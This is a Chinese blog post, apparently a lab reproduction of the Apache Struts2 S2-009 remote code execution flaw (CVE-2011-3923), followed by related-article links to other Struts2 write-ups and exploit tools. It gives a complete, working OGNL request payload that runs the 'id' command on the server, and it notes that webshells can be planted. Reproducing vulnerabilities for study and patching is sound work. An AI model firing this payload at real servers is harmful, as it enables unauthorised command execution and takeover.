struts-s2-009 代码执行(CVE-2011-3923)

已于 2024-01-09 11:35:54 修改
阅读量483 收藏 5
点赞数 8
文章标签: struts java 后端
于 2024-01-08 17:36:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135462809
版权

漏洞描述:

这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的过滤。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问漏洞触发地址

/ajax/example5.action

3.抓包,修改get请求,查询当前用户id

/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

借此漏洞,攻击者可以执行任意的代码,例如协议脚本文件;向网站写入webshell;控制整个网站或者服务器。

修复建议:

1.升级版本。

慕筱蚺
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 703
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
struts漏洞检测工具
11-08
struts2 漏洞检测工具 ,快速检测struts命令执行漏洞,可批量。运行环境要求:MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037,ST2-045,ST2-046,ST2-048,ST2-052,ST2-053,ST2-057的漏洞检测
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
xalan java代码Struts2 漏洞 S2-054、S2-055 和 Jackson 漏洞 CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、CVE-2017-15095 | SST Secure Sky Technology Co., Ltd. Struts 2 的安全更新于 2017 年 12 月 1 日发布。邮件列表上有一个故事,Jackson(Java 中流行的 JSON 库)的漏洞甚至在发布之前就已经相关了,具体是什么作者在内部系统和工具中使用 Jackson?我想知道是否这就是内容。 对于实际发布的内容,修复了以下两个安全问题。 Jackson-databind(Jackson 的一个组件)中的一个漏洞仅影响 S2-055。 S2-055: 这是 jackson-databind 的 CVE-2017-7525 的修复。 我已经将
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值(value)通过Struts2的struts2-struts1-plugin的插件传递给被攻击主机,从而实现远程代码执行攻击,直接获取远程主机的控制权限。
vulhub中Struts2-009 远程代码执行漏洞复现
最新发布
yougexiaojiuguan的博客
04-05 527
漏洞复现过程的记录
STS2G:Struts2漏洞扫描利用工具 - Golang版. Struts2 Scanner Written in Golang
05-07
STS2G Struts2漏洞测试-Golang版,部分POC参考了众多优秀项目如,漏洞测试环境采用. 目前两种模式scan和exec支持: struts2-001 struts2-005 struts2-007 struts2-008 struts2-009 struts2-012 struts2-013 struts2-015 struts2-016 struts2-045 struts2-046 struts2-048 struts2-053 struts2-057 开发目的 1、适用于命令行下操作,比如webshell下测试内网struts2漏洞. 2、可编译Windows/Linux平台可执行文件. 3、单文件运行. 使用方法 D:\Struts2-Test>ST2SG.exe -h NAME: ST2SG - Struts2 Scanner Written in Gola
struts2 s2-045
03-22
struts2 s2-045
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞(漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 525
Apache Struts2远程代码执行漏洞(S2-009)
buuctf [struts2]s2-009
qq_1873822的博客
03-22 359
漏洞描述 这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
Apache Struts2远程代码执行漏洞(S2-009)复现
qq_36933272的博客
09-05 1064
漏洞原理:ognl提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过parametersinterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。parametersinterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,ognl将其作为(top [‘foo’])(0)处理,并将“foo”...
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 587
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
struts-2.3.32所需jar包
03-09
Struts-2.3.32 版本所需jar包,可以解决Struts s2-045远程代码执行漏洞预警(CVE-2017-5638)
Struts2之命名空间详解及JSP文件上传了解案例struts009
11-30
参考博文:http://blog.csdn.net/u011638419/article/details/41620213
struts2-core-2.3.31.jar
10-09
  一、漏洞简介     Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品:Struts 1和Struts 2。     Apache Struts 2.3.5 - 2.3.31版本及2.5 - 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-15 2,CVE-2017-5638)。该漏洞与Apache Struts2 (S2-045)远程代码执行漏洞原理基本相同,均是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意命令。      二、漏洞危害     攻击者可通过发送恶意构造的HTTP数据包利用该漏洞,在受影响服务器上执行系统命令,进一步可完全控制该服务器,造成拒绝服务、数据泄露、网站造篡改等影响。由于该漏洞利用无需任何前置条件(如开启dmi,debug等功能)以及启用任何插件,因此漏洞危害较为严重。     三、修复措施     目前,Apache官方已针对该漏洞发布安全公告,并且漏洞利用代码已被公布在互联网上,请受影响用户及时检查是否受该漏洞影响。另外,已通过升级方式修复了Apache Struts2 (S2-045)远程代码执行漏洞的用户,不在该漏洞影响的范围内。     【自查方式】     用户可查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar文件,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞。     【升级修复】     受影响用户可升级版本至Apache Struts 2.3.32 或 Apache Struts 2.5.10.1以消除漏洞影响。     官方公告: https://cwiki.apache.org/confluence/display/WW/S2-046 https://cwiki.apache.org/confluence/display/WW/S2-046
K8_Struts2_EXP.zip
09-27
]10 S2-045 CVE-2017-5638 支持GetShell/获取物理路径/执行CMD命令 [+]9 devMode CVE-xxxx-xxxx 支持GetShell/获取物理路径/执行CMD命令 [+]8 S2-037 CVE-2016-4438 支持GetShell/获取物理路径/执行CMD命令 [+]7 S2-032 CVE-2016-3081 支持GetShell/获取物理路径/执行CMD命令 [+]6 S2-020 CVE-2014-0094 支持GetShell (此洞特殊,EXP集成在飞刀) [+]5 S2-019 CVE-2013-4316 支持GetShell/获取物理路径/执行CMD命令 [+]4 S2-016 CVE-2013-2251 支持GetShell/获取物理路径/执行CMD命令 [+]3 S2-013 CVE-2013-1966 支持GetShell/获取物理路径/执行CMD命令 [+]2 S2-009 CVE-2011-3923 支持GetShell/获取物理路径/执行CMD命令 [+]1 S2-005 CVE-2010-1870 支持GetShell/获取物理路径/执行CMD命令/列文件目录
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
struts-2.3.32
03-08
漏洞类型:远程代码执行 漏洞级别:高危 漏洞风险:黑客通过利用漏洞可以实现远程命令执行。 影响版本:struts2.3.5– struts2.3.31 , struts2.5–struts2.5.10。 本篇文章来源于:...
Struts2 009 漏洞分析
王嘟嘟的博客
05-28 1331
009是在003以及005的基础上进行了绕过。ParameterInterceptor会对参数进行检测,但是不会对参数的值进行检测,那么就形成了绕过。
CVE-2011-1772 struts漏洞
07-07
CVE-2011-1772是指Apache Struts框架中的一个安全漏洞。该漏洞允许攻击者通过精心构造的HTTP请求,执行任意代码或导致拒绝服务攻击。攻击者可以利用该漏洞远程执行恶意代码,从而完全控制受影响的应用程序。 这个漏洞的修复方法是升级到Apache Struts的安全版本。同时,开发者还应该审查其应用程序中使用的Apache Struts框架版本,并及时修复或升级相关组件。此外,限制用户输入、实施严格的访问控制和安全验证机制也是减轻该漏洞风险的有效措施之一。 总之,对于CVE-2011-1772这个Struts漏洞,及时更新和修复是保护系统安全的关键。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值